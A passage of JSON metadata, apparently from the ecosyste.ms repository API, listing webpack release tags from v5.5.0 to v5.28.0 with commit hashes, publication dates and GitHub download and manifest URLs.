ack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/